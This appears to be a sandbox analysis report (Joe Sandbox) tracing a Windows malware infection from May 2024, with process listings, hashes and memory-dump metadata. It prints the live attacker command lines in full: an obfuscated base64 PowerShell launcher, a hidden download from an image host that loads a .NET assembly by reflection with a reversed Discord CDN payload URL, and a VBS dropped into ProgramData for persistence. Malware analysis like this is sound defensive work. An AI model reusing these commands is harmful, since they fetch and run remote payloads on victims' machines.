NQDgTrezDgTreDIDgTreMDgTreDgTre3DgTreDIDgTreNgDgTre1DgTreDMDgTreMgDgTrexDgTreC8DgTrecwB0DgTreG4DgTreZQBtDgTreGgDgTreYwBhDgTreHQDgTredDgTreBhDgTreC8DgTrebQBvDgTreGMDgTreLgBwDgTreHDgTreDgTreYQBkDgTreHIDgTrebwBjDgTreHMDgTreaQBkDgTreC4DgTrebgBkDgTreGMDgTreLwDgTrevDgTreDoDgTrecwBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreYwBvDgTreGcDgTrebgBpDgTreHQDgTreaQB2DgTreG8DgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
      Imagebase:0x7ff788560000
      File size:452'608 bytes
      MD5 hash:04029E121A0CFA5991749937DD22A1D9
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:2
      Start time:09:21:02
      Start date:27/05/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7699e0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:3
      Start time:09:21:03
      Start date:27/05/2024
      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&ff5d219e8eb0f86100e903c887a5bea3fd1a972a6961b6842109d8e8964419b4=mh&a62d0566=si&ae322566=xe?txt.swodniw/6501452233111263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }"
      Imagebase:0x7ff788560000
      File size:452'608 bytes
      MD5 hash:04029E121A0CFA5991749937DD22A1D9
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:4
      Start time:09:21:17
      Start date:27/05/2024
      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs
      Imagebase:0x7ff788560000
      File size:452'608 bytes
      MD5 hash:04029E121A0CFA5991749937DD22A1D9
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:5
      Start time:09:21:17
      Start date:27/05/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7699e0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:9
      Start time:09:21:30
      Start date:27/05/2024
      Path:C:\Windows\System32\wscript.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs"
      Imagebase:0x7ff6844f0000
      File size:170'496 bytes
      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:10
      Start time:09:21:38
      Start date:27/05/2024
      Path:C:\Windows\System32\wscript.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs"
      Imagebase:0x7ff6844f0000
      File size:170'496 bytes
      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Reset < >
        Memory Dump Source
        • Source File: 00000001.00000002.2298423343.00007FFD9B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B670000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_7ffd9b670000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
        • Instruction ID: fe0678f73c10bff228842952657adc3d496a42dad1e7930272a0af85c2941516
        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
        • Instruction Fuzzy Hash: 1601A77020CB0C4FD748EF0CE051AA6B3E0FB85320F10056DE58AC36A1DA32E882CB45
        Memory Dump Source
        • Source File: 00000004.00000002.1892411823.00007FFD9B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B670000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_7ffd9b670000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
        • Instruction ID: 8d36bb129815077a316195e641ec2ad6d409286a5d0942217c8c6b508ec8ea06
        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
        • Instruction Fuzzy Hash: 9401A73020CB0C4FD748EF0CE051AA5B3E0FB85320F10056DE58AC36A1DA32E882CB41
        Memory Dump Source
        • Source File: 00000004.00000002.1892411823.00007FFD9B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B670000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_7ffd9b670000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: afe4ae586e06339906314751d2027b2601787e094ae3f43d598d40172822e32d
        • Instruction ID: b0812e37defaa048b595d305467db7cca5248cd6c85c1adf97b2a39df7671a9f
        • Opcode Fuzzy Hash: afe4ae586e06339906314751d2027b2601787e094ae3f43d598d40172822e32d
        • Instruction Fuzzy Hash: 86A16F97A0F7DA5EEB6356AD18F90D53F90EF5266470A01F7C8E44F0A39D08394AC362